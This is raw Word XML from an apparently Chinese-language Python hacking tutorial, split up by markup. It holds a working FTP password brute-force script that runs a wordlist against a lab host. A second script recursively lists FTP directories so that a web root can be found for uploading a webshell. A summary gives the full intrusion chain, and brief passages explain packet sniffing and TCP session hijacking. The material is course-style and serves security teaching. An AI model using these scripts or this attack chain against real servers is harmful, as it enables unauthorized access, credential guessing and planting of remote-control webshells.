      <w:proofErr w:type="spellEnd"/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(host</w:t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</w:t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passwd):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try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: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44388C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</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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连接</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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FTP Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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到服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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PC</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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，参数为</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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IP</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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或域名。</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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ftp = FTP(host)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44388C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</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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使用函数参数给出的密码与已知用户名尝试登录。</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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44388C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</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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若登录正常，则执行下一条语句，否则触发异常。</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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proofErr w:type="spellStart"/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ftp.login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(user</w:t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passwd)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44388C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44388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"[+] User {} Password is {}"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.format(user</w:t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passwd))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return True</w:t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except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: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t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return False</w:t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with </w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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open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44388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"wordlist.txt"</w:t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44388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'r'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</w:t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as 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f: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proofErr w:type="spellStart"/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all_passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/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f.readlines</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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for 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passwd </w:t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in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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all_passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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: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passwd = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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passwd.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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44388C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44388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"[-] Test password {}"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.format(passwd))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proofErr w:type="spellStart"/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get_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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44388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"172.28.131.166"</w:t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44388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"test"</w:t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passwd):</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388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44388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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4EC1E3" w14:textId="77777777" w:rsidR="0044388C" w:rsidRPr="0044388C" w:rsidRDefault="0044388C" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6A132D" w14:textId="7F6E591F" w:rsidR="004D3364" w:rsidRDefault="004D3364" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475DE7CF" w14:textId="3F435350" w:rsidR="004D3364" w:rsidRDefault="004D3364" w:rsidP="00B41980">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidR="00B41980">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F4F3D" w14:textId="3ECCBA48" w:rsidR="004D3364" w:rsidRDefault="004D3364" w:rsidP="006A0C14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4F132270" wp14:editId="4F2169A6">
            <wp:extent cx="5274310" cy="13068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9C79" w14:textId="07B0B4D9" w:rsidR="00CE3FA0" w:rsidRDefault="00CE3FA0" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2116986A" w14:textId="1B946D5F" w:rsidR="00976CED" w:rsidRDefault="00976CED" w:rsidP="00976CED">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP列文件工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A216E7B" w14:textId="2B862039" w:rsidR="001359A7" w:rsidRPr="001359A7" w:rsidRDefault="001359A7" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运维人员通常会使用ftp来更新和维护网站源代码，所以ftp文件夹里大概率会有网站服务目录，通过列出所有文件路径在结合web访问路径的方式可以很便捷的找到网站根目录。以便上传</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidR="007A3E49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F1796" w14:textId="031B7EC0" w:rsidR="00976CED" w:rsidRDefault="002A7225" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002A7225">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="002A7225">
        <w:t>FTP协议可以访问目录列表。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>ftplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>模块提供了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>nlst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>（）函数，它对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>命令输出的结果进行加工处理，并以列表形式返回。借助</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>nlst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A7225">
        <w:t>（）函数，应用程序可以轻松访问指定目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343CF4E" w14:textId="2F813BC1" w:rsidR="00A45D61" w:rsidRDefault="002A7225" w:rsidP="006A0C14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BDE3974" wp14:editId="3E3E300B">
            <wp:extent cx="5274310" cy="21158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AA04" w14:textId="11A24987" w:rsidR="00A45D61" w:rsidRDefault="00A45D61" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EB6D01" w14:textId="322C929D" w:rsidR="00A45D61" w:rsidRDefault="00876209" w:rsidP="00876209">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6989A311" w14:textId="77777777" w:rsidR="003E3AD4" w:rsidRPr="003E3AD4" w:rsidRDefault="003E3AD4" w:rsidP="003E3A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#!/usr/bin/python3</w:t>
      </w:r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# -*- encoding: utf-8 -*-</w:t>
      </w:r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# @Time     : 2020/11/25 9:51 </w:t>
      </w:r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# @Author   : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ordar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# @File     : ftp_search_web.py  </w:t>
      </w:r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# @Project  : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pythonCourse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# @Python   : 3.7.5</w:t>
      </w:r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from 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ftplib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</w:t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FTP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dir_list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[</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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]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path_list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[]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</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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列出</w:t>
      </w:r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ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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目录里的所有文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3AD4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find_web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(ftp):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global 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dir_list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while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3AD4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len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dir_list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):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this_dir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dir_list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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3AD4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len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dir_list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- </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD4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]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new_dir_list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ftp.nlst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this_dir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dir_list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dir_list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[</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD4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:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD4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len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dir_list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- </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD4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]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new_dir_list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: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</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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判断为文件</w:t>
      </w:r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,</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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将文件路径添加到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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path_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 </w:t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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3AD4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len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new_dir_list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== </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t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and 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new_dir_list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[</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD4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] == 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this_dir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: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path_list.append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this_dir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else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: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</w:t>
      </w:r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</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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判断为文件夹且文件夹内容不为空</w:t>
      </w:r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,</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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将新的</w:t>
      </w:r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list</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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添加到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dir_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3AD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，参与循环</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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dir_list.extend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new_dir_list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else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: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</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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判断为空文件夹，什么都不做</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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</w:t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pass</w:t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 print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dir_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)</w:t>
      </w:r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# </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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路径列表排序</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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path_list.sort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3E3AD4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path_list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write_to_file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path_list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3E3AD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</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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将文件路径写入文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3AD4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write_to_file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path_list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):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with </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD4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open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3E3AD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'file_path.txt'</w:t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3E3AD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'w'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</w:t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as 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f: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for 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path </w:t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in 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path_list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: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f.write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(path + </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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'</w:t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\n</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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'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__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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'__main__'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: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ftp = FTP(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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"172.28.131.166"</w:t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3E3AD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"test"</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3AD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3E3AD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"test"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proofErr w:type="spellStart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find_web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3AD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(ftp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB1374" w14:textId="77777777" w:rsidR="001359A7" w:rsidRPr="003E3AD4" w:rsidRDefault="001359A7" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F800B73" w14:textId="42D34792" w:rsidR="003A447B" w:rsidRDefault="005F05C4" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Find_web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数使用了“栈”的思想，通过循环判断“栈”是否为空，不为空就弹出最后一个文件夹路径，当最后一个文件夹为文件时，将文件路径添加到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>path_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里，以便后面保存到文件。当最后一个文件夹路径为空文件夹时，什么都不做，因为空文件夹对我们来说没有意义。当最后一个文件夹里面还有内容时，将新发现的文件路径或文件夹路径添加到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dir_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，参与循环。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E904B6" w14:textId="72AA5E78" w:rsidR="005F05C4" w:rsidRPr="008673A8" w:rsidRDefault="008673A8" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当文件很多时，将文件夹路径写入文件就很有必要了，可以</w:t>
      </w:r>
      <w:r w:rsidR="00AF75C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用记事本等打开文件然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过搜索来快速找到网站根目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373FCB7D" w14:textId="256E3D06" w:rsidR="002E0C14" w:rsidRDefault="002E0C14" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1127D504" w14:textId="3F8B7AD9" w:rsidR="002E0C14" w:rsidRDefault="00993EB1" w:rsidP="00FD0892">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidR="00FD0892">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ED80EA" w14:textId="48F3193E" w:rsidR="00993EB1" w:rsidRDefault="00993EB1" w:rsidP="006A0C14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311C3432" wp14:editId="5C398229">
            <wp:extent cx="5274310" cy="7213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5091" w14:textId="7CB72489" w:rsidR="00993EB1" w:rsidRDefault="007A2099" w:rsidP="006A0C14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1901A005" wp14:editId="6E64AA38">
            <wp:extent cx="3200400" cy="1952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3EF5" w14:textId="77777777" w:rsidR="009423F4" w:rsidRDefault="009423F4" w:rsidP="009423F4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    下面总结黑客攻击过程。首先，通过端口扫描获取提供服务的端口，从中找出开放FTP服务的服务器，再利用密码破解技术获取密码。然后，通过访问目录获取Web服务所在位置。最后，上传Web shell文件，从远程PC操纵服务器PC。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F06FDEB" w14:textId="0C77E58B" w:rsidR="00993EB1" w:rsidRPr="00E46AC3" w:rsidRDefault="009423F4" w:rsidP="009423F4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    如果将上述过程编为一个应用程序，则可以开发专用程序，用于自动返回所有可被攻击的URL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327115E" w14:textId="43B8FF74" w:rsidR="007D6467" w:rsidRDefault="00030089" w:rsidP="00E46AC3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．包嗅探</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59253B0D" w14:textId="77777777" w:rsidR="00030089" w:rsidRPr="005B7C6D" w:rsidRDefault="00030089" w:rsidP="00030089">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于以太网的同一网络环境（使用同一路由器）中，数据包的传送是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MediaAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B7C6D">
        <w:t xml:space="preserve"> Control,</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>介质访问控制）地址进行的。一台</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向另外一台</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传送数据时，会将数据广播到同网段的所有</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。所有接收到数据包的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将自身</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址与数据包的目的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址进行比较，若两者一致，则接收并处理，否则丢弃。借助包嗅探技术，</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会接收并处理所有数据句。这样，同一网络中传播的所有数据可尽收眼底，一目了然。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480BE25" w14:textId="7A0B4A9C" w:rsidR="007D6467" w:rsidRDefault="007D6467" w:rsidP="005B7C6D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3A3337" w14:textId="01574E76" w:rsidR="007D6467" w:rsidRDefault="0059592C" w:rsidP="00E46AC3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会话劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE62A61" w14:textId="77777777" w:rsidR="00030089" w:rsidRPr="005B7C6D" w:rsidRDefault="00030089" w:rsidP="00030089">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持（</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Session Hijacking)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击大致分为</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持与</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持两类。前者是指通过盗取保存服务认证信息的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>SessionID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值进行黑客攻击，后者是指盗取</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包信息。此处以网络黑客攻击中常用的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持为中心进行讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BBB57" w14:textId="517A0D9E" w:rsidR="007D6467" w:rsidRDefault="00030089">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52694A47" wp14:editId="176B06F2">
            <wp:extent cx="5274310" cy="21653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8188" w14:textId="77777777" w:rsidR="0059592C" w:rsidRPr="005B7C6D" w:rsidRDefault="0059592C" w:rsidP="0059592C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Port</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Sequence Number</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三个要素对通信对方进行认证。</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话劫持中，先通过包嗅探获取认证信息，然后使用它在中间拦截客户机与服务器之间的通信。黑客暂时断开客户机与服务器之间的连接，将发送方</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改为黑客</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重设与服务器的连接。在服务器看来，通信只是暂时发生了中断，然后再次成功连接，从而将黑客</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>误认为客户机。客户机与黑客</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也采用类似方式设置连接。这样，客户机与服务器之间的所有通信都会经过黑客</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，黑客即可控制所有信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2815D3DC" w14:textId="686D6DAB" w:rsidR="007D6467" w:rsidRDefault="007D6467"/>
